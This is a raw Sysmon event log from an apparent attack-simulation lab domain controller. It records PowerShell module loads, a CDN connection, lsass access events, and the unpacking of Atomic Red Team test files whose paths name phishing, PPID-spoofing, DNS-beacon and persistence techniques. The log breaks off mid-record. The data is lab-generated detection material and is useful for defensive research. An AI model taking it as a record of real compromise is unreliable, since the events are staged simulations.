15:52:36.491{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\56115196\powershell-yaml\Tests\powershell-yaml.Tests.ps12020-11-03 15:52:36.491 11241100x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.476{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\56115196\powershell-yaml\lib\netstandard1.3\YamlDotNet.dll2020-11-03 15:52:36.476 11241100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.476{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\56115196\powershell-yaml\lib\net45\YamlDotNet.dll2020-11-03 15:52:36.476 11241100x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.476{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\56115196\powershell-yaml\lib\net35\YamlDotNet.dll2020-11-03 15:52:36.476 11241100x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:36.476{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\56115196\powershell-yaml\Load-Assemblies.ps12020-11-03 15:52:36.476 11241100x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.460{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sapb5xtz\lib\net45\YamlDotNet.dll2020-11-03 15:52:36.460 11241100x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.460{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sapb5xtz\lib\netstandard1.3\YamlDotNet.dll2020-11-03 15:52:36.460 11241100x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:36.445{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sapb5xtz\lib\net35\YamlDotNet.dll2020-11-03 15:52:36.445 11241100x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:36.445{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sapb5xtz\Tests\powershell-yaml.Tests.ps12020-11-03 15:52:36.445 11241100x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:36.445{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sapb5xtz\Load-Assemblies.ps12020-11-03 15:52:36.445 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:37.149{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:37.149{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:37.149{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:37.024{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps12020-11-03 15:52:37.024 11241100x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:37.024{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Tests\powershell-yaml.Tests.ps12020-11-03 15:52:37.024 11241100x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:37.024{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\netstandard1.3\YamlDotNet.dll2020-11-03 15:52:37.024 11241100x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:37.024{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net45\YamlDotNet.dll2020-11-03 15:52:37.024 11241100x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:37.024{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net35\YamlDotNet.dll2020-11-03 15:52:37.024 22542200x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:36.313{D28789B6-7CB1-5FA1-BD00-000000008801}4512psg-prod-eastus.azureedge.net0type: 5 psg-prod-eastus.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:36.301{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50337-false152.199.19.161-443https 11241100x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.938{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_test.bat2020-11-03 15:52:41.938 11241100x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.923{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_masquerading.vbs2020-11-03 15:52:41.923 11241100x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.923{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_masquerading.ps12020-11-03 15:52:41.923 11241100x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:41.923{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\bin\T1036.003.exe2020-11-03 15:52:41.923 11241100x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:41.892{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1027.004\bin\T1027.004_DynamicCompile.exe2020-11-03 15:52:41.892 11241100x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:41.798{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1014\bin\puppetstrings.exe2020-11-03 15:52:41.798 11241100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.578{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Misc\Discovery.bat2020-11-03 15:52:41.578 11241100x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.563{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Labs\Webinar11062017-Labs.bat2020-11-03 15:52:41.563 11241100x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.563{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Initial_Access\generate-macro.ps12020-11-03 15:52:41.563 11241100x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.563{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Initial_Access\AtomicHTA.hta2020-11-03 15:52:41.563 11241100x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.547{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\qbot_infection_reaction.vbs2020-11-03 15:52:41.547 11241100x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.547{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\dragonstail_benign.ps12020-11-03 15:52:41.547 11241100x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Reactor.bat2020-11-03 15:52:41.532 11241100x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Plutonium.bat2020-11-03 15:52:41.532 11241100x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Fission.bat2020-11-03 15:52:41.532 11241100x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_DragonsTail.ps12020-11-03 15:52:41.532 11241100x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_DragonsTail.bat2020-11-03 15:52:41.532 11241100x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Cyclotron.bat2020-11-03 15:52:41.532 11241100x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Argonaut.ps12020-11-03 15:52:41.532 11241100x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:41.532{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\atomic-hello.exe2020-11-03 15:52:41.532 11241100x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.971{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1566.001\bin\PhishingAttachment.xlsm2020-11-03 15:52:42.971 11241100x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.956{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1564.004\src\test.ps12020-11-03 15:52:42.956 11241100x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.925{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1562.004\bin\AtomicTest.exe2020-11-03 15:52:42.925 11241100x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.893{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1559.002\src\PowerShell_Script_For_DDE_Document.ps12020-11-03 15:52:42.893 11241100x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.784{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\vbsstartup.vbs2020-11-03 15:52:42.784 11241100x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.784{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\jsestartup.jse2020-11-03 15:52:42.784 11241100x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.784{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\batstartup.bat2020-11-03 15:52:42.784 11241100x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.752{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.011\bin\AtomicTest.exe2020-11-03 15:52:42.752 11241100x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.752{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.011\bin\AtomicTest.dll2020-11-03 15:52:42.752 11241100x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.737{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.010\bin\T1546.010x86.dll2020-11-03 15:52:42.737 11241100x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.737{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.010\bin\T1546.010.dll2020-11-03 15:52:42.737 11241100x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.674{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1543.003\bin\AtomicService.exe2020-11-03 15:52:42.674 11241100x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.580{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\x64\T1218.dll2020-11-03 15:52:42.580 11241100x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.580{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\Win32\T1218.dll2020-11-03 15:52:42.580 11241100x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.580{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\Win32\T1218-2.dll2020-11-03 15:52:42.580 11241100x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.549{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.010\bin\AllTheThingsx86.dll2020-11-03 15:52:42.549 11241100x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.549{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.010\bin\AllTheThingsx64.dll2020-11-03 15:52:42.549 11241100x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.518{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.008\src\Win32\T1218-2.dll2020-11-03 15:52:42.518 11241100x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.518{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.007\src\x64\T1218.dll2020-11-03 15:52:42.518 11241100x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.486{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.005\src\powershell.ps12020-11-03 15:52:42.486 11241100x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.486{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.005\src\T1218.005.hta2020-11-03 15:52:42.486 11241100x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.471{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.004\src\InstallUtilTestHarness.ps12020-11-03 15:52:42.471 11241100x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.455{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.001\src\T1218.001.chm2020-11-03 15:52:42.455 11241100x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.377{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1134.004\src\PPID-Spoof.ps12020-11-03 15:52:42.377 11241100x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.377{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1134.004\bin\calc.dll2020-11-03 15:52:42.377 11241100x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.361{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1127.001\src\T1127.001.csproj2020-11-03 15:52:42.361 11241100x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.330{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1114.001\src\Get-Inbox.ps12020-11-03 15:52:42.330 11241100x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.314{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1110.003\src\parse_net_users.bat2020-11-03 15:52:42.314 11241100x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.236{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1087.002\src\AdFind.exe2020-11-03 15:52:42.236 11241100x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.220{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1074.001\src\Discovery.bat2020-11-03 15:52:42.220 11241100x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.205{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1071.004\src\T1071-dns-domain-length.ps12020-11-03 15:52:42.205 11241100x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.205{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1071.004\src\T1071-dns-beacon.ps12020-11-03 15:52:42.205 11241100x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 